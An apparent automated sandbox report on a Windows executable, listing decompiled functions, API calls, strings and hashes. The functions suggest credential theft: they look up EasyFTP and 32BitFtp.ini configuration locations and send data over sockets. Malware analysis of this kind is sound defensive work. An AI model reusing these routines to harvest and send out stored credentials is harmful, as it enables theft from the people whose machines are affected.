Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482

Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4

Strings

SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32, xrefs: 0040CB8D
EasyFTP, xrefs: 0040CBA3

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: EasyFTP$SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
API String ID: 1884169789-2776585315
Opcode ID: 9f2afe7237929f859a56fa488468728360c5d6e741fae9cd32d000a34098b0dc
Instruction ID: 012631f08c3f720db82d748fc1356d0498b941b070556770c17d11d6cf9e9cf7
Opcode Fuzzy Hash: 9f2afe7237929f859a56fa488468728360c5d6e741fae9cd32d000a34098b0dc
Instruction Fuzzy Hash: DBF03670580104F9EF117BA1CC47FAD7E76DF10748F20417A7900741F1DAB99B91965C

Uniqueness

Uniqueness Score: -1.00%

Function 00401EB1, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401EB1(void* __eflags, signed int _a4) {
				intOrPtr _v8;
				void* _t12;
				intOrPtr _t19;
				intOrPtr* _t21;

				_v8 = E004018CF(0x105);
				if( *0x414b7d != 0) {
					_t12 =  *0x414b7d(0, _a4, 0, 0, _v8); // executed
					if(_t12 < 0) {
						goto L3;
					}
				} else {
					L3:
					E004018B8(_v8);
					_v8 = 0;
					_t21 = 0x414b81;
					while( *_t21 != 0) {
						_t20 =  *_t21;
						if( *((intOrPtr*)( *_t21 + 4)) != (_a4 & 0xffff7fff)) {
							L7:
							_t21 = _t21 + 4;
							continue;
						} else {
							_t19 = E00401D71( *_t20, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", _t20 + 8, 0);
							if(_t19 == 0) {
								goto L7;
							} else {
								_v8 = _t19;
							}
						}
						goto L9;
					}
				}
				L9:
				return _v8;
			}

0x00401ec2
0x00401ecc
0x00401edc
0x00401ee4
0x00000000
0x00000000
0x00401ece
0x00401ee6
0x00401ee9
0x00401eee
0x00401ef5
0x00401f29
0x00401efc
0x00401f09
0x00401f26
0x00401f26
0x00000000
0x00401f0b
0x00401f1d
0x00401f1f
0x00000000
0x00401f21
0x00401f21
0x00401f21
0x00401f1f
0x00000000
0x00401f09
0x00401f29
0x00401f2e
0x00401f33

APIs

Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00000105), ref: 00401EDC

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00401F11

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocFolderLocalPath
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 1254228173-2036018995
Opcode ID: 56f2e342e5eafcf3341f7299bb2d4cc3d53dd96be20be7e6c5c16e348e6a22ea
Instruction ID: 7738f67dd9614b2846b3a2efeb9c4eebaa8b985614ff96bd2da1bef5687651b4
Opcode Fuzzy Hash: 56f2e342e5eafcf3341f7299bb2d4cc3d53dd96be20be7e6c5c16e348e6a22ea
Instruction Fuzzy Hash: A8018436A0420AEBDB109F54CD02F9EB7A5EB44354F208177F501BB2E0E778DA50DB89

Uniqueness

Uniqueness Score: -1.00%

Function 00407E69, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407E69(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				int _t11;
				void* _t17;
				void* _t18;
				void* _t19;

				_t19 = __edi;
				_t18 = __ecx;
				_t17 = __ebx;
				_v8 = E004015F0(_a4, 0x1d, 0);
				_t11 = GetWindowsDirectoryA( &_v269, 0x104);
				if(_t11 != 0) {
					_t21 = _t11 - 0x104;
					if(_t11 <= 0x104) {
						E0040406C(_a4, E00401DF8( &_v269,  &_v269, "\\32BitFtp.ini"), 0xbeef0000); // executed
						E004018B8(_t14);
					}
				}
				return E00401636(_t17, _t18, _t19, _t21, _a4, _v8);
			}

0x00407e69
0x00407e69
0x00407e69
0x00407e7e
0x00407e92
0x00407e94
0x00407e96
0x00407e9b
0x00407eb8
0x00407ebd
0x00407ebd
0x00407e9b
0x00407ece

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00407E8D

Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40

Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4

Strings

\32BitFtp.ini, xrefs: 00407E9D

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$DirectoryFreeLocalWindowslstrcatlstrcpy
String ID: \32BitFtp.ini
API String ID: 2776971706-1260517637
Opcode ID: 47931a09d2735367c308d23eac085567dd67203f5abc229086505a3d133c96b4
Instruction ID: cbf003877d027d6a197ada6978e58f7ea5a3bd39d8541963de42c9327f17cd29
Opcode Fuzzy Hash: 47931a09d2735367c308d23eac085567dd67203f5abc229086505a3d133c96b4
Instruction Fuzzy Hash: C3F08970A00108BAEB10BB61CC42FDE791D9B40344F104077B704B51E2DAB99F80969D

Uniqueness

Uniqueness Score: -1.00%

Function 004024D6, Relevance: 3.0, APIs: 2, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004024D6(CHAR* _a4, _Unknown_base(*)()** _a8) {
				struct HINSTANCE__* _t4;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t10;
				CHAR* _t12;
				_Unknown_base(*)()** _t13;

				_t4 = LoadLibraryA(_a4); // executed
				_t5 = _t4;
				if(_t5 != 0) {
					_t12 = _a4;
					_t10 = _t5;
					_t13 = _a8;
					while(1) {
						asm("cld");
						asm("repne scasb");
						if( *_t12 == 0) {
							break;
						}
						_t8 = GetProcAddress(_t10, _t12); // executed
						_t9 = _t8;
						if(_t9 != 0) {
							 *_t13 = _t9;
							_t13 = _t13 + 4;
							continue;
						} else {
							return _t9;
						}
						goto L8;
					}
					return 1;
				} else {
					return _t5;
				}
				L8:
			}

0x004024df
0x004024e5
0x004024e7
0x004024f0
0x004024f4
0x004024f7
0x004024fa
0x004024fc
0x00402503
0x00402509
0x00000000
0x00000000
0x0040250d
0x00402512
0x00402514
0x0040251d
0x0040251f
0x00000000
0x0040251a
0x0040251a
0x0040251a
0x00000000
0x00402514
0x0040252d
0x004024ed
0x004024ed
0x004024ed
0x00000000

APIs

LoadLibraryA.KERNEL32(?), ref: 004024DF
GetProcAddress.KERNEL32(00000000,?), ref: 0040250D

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 6732e7a58c27bc06566346bb9b7272300466cfa088261deaf2f8ea774c68ea67
Instruction ID: fbc1fe3612a262e3ea9a0b223a66db08094d4ab5f536d4fd90f1adfdd8ad2806
Opcode Fuzzy Hash: 6732e7a58c27bc06566346bb9b7272300466cfa088261deaf2f8ea774c68ea67
Instruction Fuzzy Hash: 20F09A732051142ADB106A3AAC4499B6B88E7E33B8B105137E806A62C1E5B9DD8682A8

Uniqueness

Uniqueness Score: -1.00%

Function 0040E566, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040E566(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				void* _t14;

				if( *0x414b57 != 0) {
					_v8 = E004018CF(0x105);
					_v12 = 0x104;
					_t14 =  *0x414b57(_a8, _a8, _v8,  &_v12); // executed
					_push(_v8);
					L0041066A();
					if(_t14 > 3) {
						E00404351(_a4, _v8, ".xml", 0xbeef0000);
					}
					return E004018B8(_v8);
				} else {
					return __eax;
				}
			}

0x0040e573
0x0040e583
0x0040e586
0x0040e59a
0x0040e5a0
0x0040e5a3
0x0040e5ab
0x0040e5bd
0x0040e5bd
0x0040e5cb
0x0040e576
0x0040e576
0x0040e576

APIs

lstrlen.KERNEL32(?), ref: 0040E5A3

Strings

.xml, xrefs: 0040E5B2

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen
String ID: .xml
API String ID: 1659193697-2937849440
Opcode ID: 1c5bbdcc3d911d9b91bbd0106df6c2713ab6e1bad338dff2e9ebbcafa85cc281
Instruction ID: d50f8ccee8f7243a6a0ed472ec34bd5e2a0a6362bf3d9178c3556d4465c1c39f
Opcode Fuzzy Hash: 1c5bbdcc3d911d9b91bbd0106df6c2713ab6e1bad338dff2e9ebbcafa85cc281
Instruction Fuzzy Hash: 69F03A32900108FADF11BBD1CC42ECDBB76AB50308F208576B660B51B0D7B99BA4EB48

Uniqueness

Uniqueness Score: -1.00%

Function 00401F36, Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00401F36(int _a4) {
				char* _t4;
				void* _t10;

				_t4 = _a4;
				if(_t4 == 0 ||  *_t4 == 0) {
					return 0;
				} else {
					_push(0);
					_push(0);
					_push(3);
					_push(0);
					_push(0);
					_push(0x80);
					ExitProcess(_a4); // executed
					_t10 = _t4 + 1;
					if(_t10 != 0) {
						CloseHandle(_t10);
						return 1;
					}
					return 0;
				}
			}

0x00401f3d
0x00401f3f
0x00401f4d
0x00401f50
0x00401f50
0x00401f52
0x00401f54
0x00401f56
0x00401f58
0x00401f5a
0x00401f62
0x00401f6b
0x00401f6c
0x00401f6f
0x00000000
0x00401f74
0x00401f7b
0x00401f7b

APIs

ExitProcess.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401F62
CloseHandle.KERNEL32(00000000,?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401F6F

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseExitHandleProcess
String ID:
API String ID: 1046136549-0
Opcode ID: aae0be0bb2ecbd40ab9fe935455bc870e6245361f36fb792026b32c129e776f9
Instruction ID: ff3804100ddf8c199ee2f8612031d1c0044171ab4ec93654cd43e20a2e279d87
Opcode Fuzzy Hash: aae0be0bb2ecbd40ab9fe935455bc870e6245361f36fb792026b32c129e776f9
Instruction Fuzzy Hash: C6E04F7235024537EB3155699C83F46258857127A8F104032B345FD2D1DAE9E9D0425C

Uniqueness

Uniqueness Score: -1.00%

Function 004037C6, Relevance: 3.0, APIs: 2, Instructions: 22
networkCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E004037C6(void* __eax, intOrPtr _a4) {
				void* _t5;
				intOrPtr* _t7;

				_push(_a4);
				L0041082C();
				if(__eax == 0xffffffff) {
					_push(_a4);
					L00410832(); // executed
					_t5 = __eax;
					if(_t5 != 0) {
						_t7 =  *((intOrPtr*)(_t5 + 0xc));
						if(_t7 != 0) {
							return  *((intOrPtr*)( *_t7));
						}
						return 0xffffffff;
					}
					return 0xffffffff;
				}
				return __eax;
			}

0x004037c9
0x004037cc
0x004037d4
0x004037d6
0x004037d9
0x004037de
0x004037e0
0x004037ed
0x004037ef
0x00000000
0x004037fa
0x00000000
0x004037f1
0x00000000
0x004037e2
0x004037fd

APIs

inet_addr.WSOCK32(?), ref: 004037CC
gethostbyname.WSOCK32(?,?), ref: 004037D9

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: gethostbynameinet_addr
String ID:
API String ID: 1594361348-0
Opcode ID: 714c08619f4502eaee032449eb1ef9973a266bd764f847276e968b64be4354d4
Instruction ID: 5e93a2d41fda1c27195ed80854e744a6a241ee01f30d7083f3dbc766825ad624
Opcode Fuzzy Hash: 714c08619f4502eaee032449eb1ef9973a266bd764f847276e968b64be4354d4
Instruction Fuzzy Hash: D5E04FB420440A9FCA11AE3DC8428557F987B163B93108333F130EB2F1D778D941A749

Uniqueness

Uniqueness Score: -1.00%

Function 00403850, Relevance: 3.0, APIs: 2, Instructions: 16
networkCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00403850(intOrPtr __eax) {
				void* _t4;
				void* _t8;

				 *((intOrPtr*)(_t8 - 0xc)) = __eax;
				_push(0x10);
				_t4 = _t8 - 0x10;
				_push(_t4);
				_push(0); // executed
				L0041083E(); // executed
				if(_t4 == 0xffffffff) {
					_push(0);
					L00410844();
				}
				return 0;
			}

0x00403861
0x00403864
0x00403866
0x00403869
0x0040386a
0x0040386b
0x00403873
0x00403875
0x00403876
0x0040387b
0x00403881

APIs

connect.WSOCK32(00000000,00000002,00000010,00000002,00000001,00000006), ref: 0040386B
closesocket.WSOCK32(00000000,00000000,00000002,00000010,00000002,00000001,00000006), ref: 00403876

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: closesocketconnect
String ID:
API String ID: 1323028321-0
Opcode ID: 3eb64ca85f9db12466169f07e7e5c2d865243061ebee63a72645f6ce755d8895
Instruction ID: 2c0b4ed7b26df5b6c8b3ddf8a33cbfcd02c62134e5053cecd8bd2a5708bf71a2
Opcode Fuzzy Hash: 3eb64ca85f9db12466169f07e7e5c2d865243061ebee63a72645f6ce755d8895
Instruction Fuzzy Hash: B5D0C972A042046AD700BABA5CC1EBEA69CAF10328F109A7BB526E51C2D5BCC584D629

Uniqueness

Uniqueness Score: -1.00%

Function 0041062F, Relevance: 3.0, APIs: 2, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041062F() {
				signed int _t5;
				signed int _t6;
				void* _t8;
				signed int _t9;

				L0:
				while(1) {
					L0:
					_t5 = GetTickCount();
					L1:
					 *_t5 =  *_t5 + _t5;
					 *((intOrPtr*)(_t9 + 0xa)) =  *((intOrPtr*)(_t9 + 0xa)) + _t8;
					_t6 = _t5 / _t9;
					_t13 = _t5 % _t9 - 5;
					if(_t5 % _t9 != 5) {
						L3:
						continue;
					}
					L2:
					L4:
					E004105C3(_t6, _t13);
					ExitProcess(0); // executed
					L5:
					goto ( *0x418148);
				}
			}

0x0041062f
0x0041062f
0x0041062f
0x0041062f
0x00410630
0x00410631
0x00410633
0x0041063b
0x0041063d
0x00410640
0x00410644
0x00000000
0x00410644
0x00410642
0x00410646
0x00410646
0x0041064d
0x00410652
0x00410652
0x00410652

APIs

GetTickCount.KERNEL32 ref: 0041062F
ExitProcess.KERNEL32(00000000), ref: 0041064D

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CountExitProcessTick
String ID:
API String ID: 232575682-0
Opcode ID: 03098564a4423b0794b70d1d0606a8fc149a8030d21a065d1568f8fca50770ea
Instruction ID: 1157fecdfa7adbe7534eede1c2d4befca9c0b9d0b40d7f3ba9e62a443b5a47ca
Opcode Fuzzy Hash: 03098564a4423b0794b70d1d0606a8fc149a8030d21a065d1568f8fca50770ea
Instruction Fuzzy Hash: 26C04C3075510454D79462A295567ED100347D5708F51801BA11A541868CDC0AF6151F

Uniqueness

Uniqueness Score: -1.00%

Function 004039A2, Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E004039A2(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v2052;
				void* _t14;
				void* _t17;
				intOrPtr _t19;
				char* _t20;
				void* _t23;
				intOrPtr _t24;

				_t24 = 0;
				_t14 = E004038D0(_a4, 0x5a); // executed
				if(_t14 != 0) {
					while(1) {
						_t17 = E004038D0(_a4, 0x5a); // executed
						if(_t17 == 0) {
							break;
						}
						__eflags = _a12 - 0x800;
						if(_a12 <= 0x800) {
							_t19 = _a12;
						} else {
							_t19 = 0x800;
						}
						_push(0);
						_push(_t19);
						_t20 =  &_v2052;
						_push(_t20);
						_push(_a4);
						L00410856(); // executed
						__eflags = _t20;
						if(__eflags >= 0) {
							if(__eflags != 0) {
								 *((intOrPtr*)( *_a8 + 0x10))(_a8,  &_v2052, _t20, 0, _t20);
								_pop(_t23);
								_a12 = _a12 - _t23;
								__eflags = _a12;
								if(_a12 != 0) {
									__eflags = _t24;
									if(_t24 == 0) {
										continue;
									}
								} else {
									_t24 = _t24 + 1;
								}
							} else {
								_t24 = _t24 + 1;
							}
						} else {
						}
						goto L13;
					}
				}
				L13:
				return _t24;
			}

0x004039ac
0x004039b3
0x004039ba
0x004039bc
0x004039c1
0x004039c8
0x00000000
0x00000000
0x004039cc
0x004039d3
0x004039dc
0x004039d5
0x004039d5
0x004039d5
0x004039df
0x004039e1
0x004039e2
0x004039e8
0x004039e9
0x004039ec
0x004039f1
0x004039f3
0x004039f7
0x00403a0f
0x00403a12
0x00403a13
0x00403a16
0x00403a1a
0x00403a1f
0x00403a21
0x00000000
0x00000000
0x00403a1c
0x00403a1c
0x00403a1c
0x004039f9
0x004039f9
0x004039f9
0x00000000
0x004039f5
0x00000000
0x004039f3
0x004039ca
0x00403a23
0x00403a27

APIs

Part of subcall function 004038D0: select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403915

6FC11E90.WSOCK32(?,?,00000800,00000000), ref: 004039EC

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: select
String ID:
API String ID: 1274211008-0
Opcode ID: 69b0589e83bec19c8e9aae5d3ba801705d1d6016f0d4b8e48cd570a5aa8ad3ce
Instruction ID: 2f40260d67330ca774b86e0443aa4ef1630bdb93cf1b4663f33e685bee7b00eb
Opcode Fuzzy Hash: 69b0589e83bec19c8e9aae5d3ba801705d1d6016f0d4b8e48cd570a5aa8ad3ce
Instruction Fuzzy Hash: 3401A171710209AFDF109E24CC41BAB3B9CBB04306F208237B992A61C0D7B8DB559F99

Uniqueness

Uniqueness Score: -1.00%

Function 00403930, Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00403930(void* __edi, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v5;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t22;
				char* _t23;
				void* _t26;

				_t26 = __edi;
				_t23 = 0;
				_t13 = E004038D0(_a4, 0x5a); // executed
				if(_t13 != 0) {
					while(1) {
						_t16 = E004038D0(_a4, 0x5a); // executed
						if(_t16 == 0) {
							break;
						}
						_push(0);
						_push(1);
						_t18 =  &_v5;
						_push(_t18);
						_push(_a4);
						L00410856(); // executed
						__eflags = _t18;
						if(_t18 > 0) {
							__eflags = _v5 - _a16;
							if(__eflags == 0) {
								_t23 = 1;
							}
							_t22 = E00401082( *((intOrPtr*)( *_a8 + 0x10))(_a8,  &_v5, 1, 0), _t26, __eflags, _a8);
							__eflags = _t22 - _a12;
							if(_t22 < _a12) {
								__eflags = _t23;
								if(_t23 == 0) {
									continue;
								}
							} else {
							}
						}
						goto L9;
					}
				}
				L9:
				return _t23;
			}

0x00403930
0x00403937
0x0040393e
0x00403945
0x00403947
0x0040394c
0x00403953
0x00000000
0x00000000
0x00403957
0x00403959
0x0040395b
0x0040395e
0x0040395f
0x00403962
0x00403967
0x00403969
0x0040396e
0x00403971
0x00403973
0x00403973
0x0040398b
0x00403990
0x00403993
0x00403997
0x00403999
0x00000000
0x00000000
0x00000000
0x00403995
0x00403993
0x00000000
0x00403969
0x00403955
0x0040399b
0x0040399f

APIs

Part of subcall function 004038D0: select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403915

6FC11E90.WSOCK32(?,?,00000001,00000000), ref: 00403962

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: select
String ID:
API String ID: 1274211008-0
Opcode ID: a7b6f319686e6ebda70a209903e400caaa9050ca94bf6d932e9478b3526deab0
Instruction ID: 8c0b6cfc6c1c11aca7b90cc778563e244997239a44563fd1294608556312e14e
Opcode Fuzzy Hash: a7b6f319686e6ebda70a209903e400caaa9050ca94bf6d932e9478b3526deab0
Instruction Fuzzy Hash: 9101BC70204209BBDF10AE95DC82FAE3F69AB0130AF108137F900AA1E1D7B9DB418759

Uniqueness

Uniqueness Score: -1.00%

Function 00403884, Relevance: 1.5, APIs: 1, Instructions: 32
networkCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00403884(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				intOrPtr _t12;

				if(_a12 != 0) {
					_t12 = _a8;
					_t11 = 0;
					while(1) {
						_push(0);
						_push(_a12);
						_push(_t12);
						_push(_a4);
						L0041084A(); // executed
						if(_t8 <= 0) {
							break;
						}
						_t12 = _t12 + _t8;
						_a12 = _a12 - _t8;
						if(_a12 != 0) {
							continue;
						} else {
							_t11 = 1;
						}
						break;
					}
					return _t11;
				} else {
					return 1;
				}
			}

0x0040388d
0x0040389a
0x0040389d
0x004038a2
0x004038a2
0x004038a4
0x004038a7
0x004038a8
0x004038ab
0x004038b2
0x00000000
0x00000000
0x004038b4
0x004038b6
0x004038bd
0x00000000
0x004038bf
0x004038bf
0x004038bf
0x00000000
0x004038bd
0x004038cd
0x0040388f
0x00403897
0x00403897

APIs

send.WSOCK32(?,?,00000000,00000000), ref: 004038AB

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 5237cb5b43bce20ae874b933877cdd6ac94511ecc8540f56170920c69c39cbca
Instruction ID: 7010a4d4224b84c81328f756437b4738d149add1ed75441a8268b8f5070a40e4
Opcode Fuzzy Hash: 5237cb5b43bce20ae874b933877cdd6ac94511ecc8540f56170920c69c39cbca
Instruction Fuzzy Hash: 4BF0E533614308ABEB106E15CC40B9B3B9CEB90759F14883BF901A62C0D3BDDA958359

Uniqueness

Uniqueness Score: -1.00%

Function 00401422, Relevance: 1.5, APIs: 1, Instructions: 28
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401422(void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t10;
				long _t13;
				void* _t15;

				_t15 = _a8;
				while(1) {
					_t10 = WriteFile(_a4, _t15, _a12,  &_v8, 0); // executed
					if(_t10 == 0 || _v8 == 0) {
						break;
					}
					_t13 = _v8;
					_t15 = _t15 + _t13;
					_t7 =  &_a12;
					 *_t7 = _a12 - _t13;
					if( *_t7 != 0) {
						continue;
					} else {
						return 1;
					}
					L6:
				}
				return 0;
				goto L6;
			}

0x00401429
0x0040142c
0x00401439
0x00401440
0x00000000
0x00000000
0x0040144f
0x00401452
0x00401454
0x00401454
0x00401457
0x00000000
0x00401459
0x00401460
0x00401460
0x00000000
0x00401457
0x0040144c
0x00000000

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401439

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 0abead393dd6c6aee7a413c553546d88cf46b493f200794402aa322d28499946
Instruction ID: ffb465389c342e6fff0e154865cbb03be69b4e2e252949391933a2331f5ccebc
Opcode Fuzzy Hash: 0abead393dd6c6aee7a413c553546d88cf46b493f200794402aa322d28499946
Instruction Fuzzy Hash: 71E06532510119ABCF10DE689C01FDF77A8DB50358F044126F914E61E0E7B5DF50C795

Uniqueness

Uniqueness Score: -1.00%

Function 004038D0, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E004038D0(intOrPtr _a4, intOrPtr _a8) {
				void* _v260;
				char _v264;
				intOrPtr _v268;
				char _v272;
				char* _t11;

				_push(_a8);
				_pop( *_t2);
				_v268 = 0;
				_v264 = 1;
				_push(_a4);
				_pop( *__eax);
				_push( &_v272);
				_push(0);
				_push(0);
				_t11 =  &_v264;
				_push(_t11);
				_push(0); // executed
				L00410850(); // executed
				if(_t11 == 0xffffffff || _t11 == 0) {
					return 0;
				} else {
					return 1;
				}
			}

0x004038d9
0x004038dc
0x004038e2
0x004038ec
0x004038fc
0x004038ff
0x00403907
0x00403908
0x0040390a
0x0040390c
0x00403912
0x00403913
0x00403915
0x0040391d
0x00000000
0x00403927
0x00000000
0x00403927

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403915

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: select
String ID:
API String ID: 1274211008-0
Opcode ID: 4c60f3b67a82c948399910200c1b47c0ae9333acbf075e6a1ced9f152c3a6a7b
Instruction ID: 10b725986883f22aabceafb6b3feb490bf47cb93175d073b1889671c1eb66941
Opcode Fuzzy Hash: 4c60f3b67a82c948399910200c1b47c0ae9333acbf075e6a1ced9f152c3a6a7b
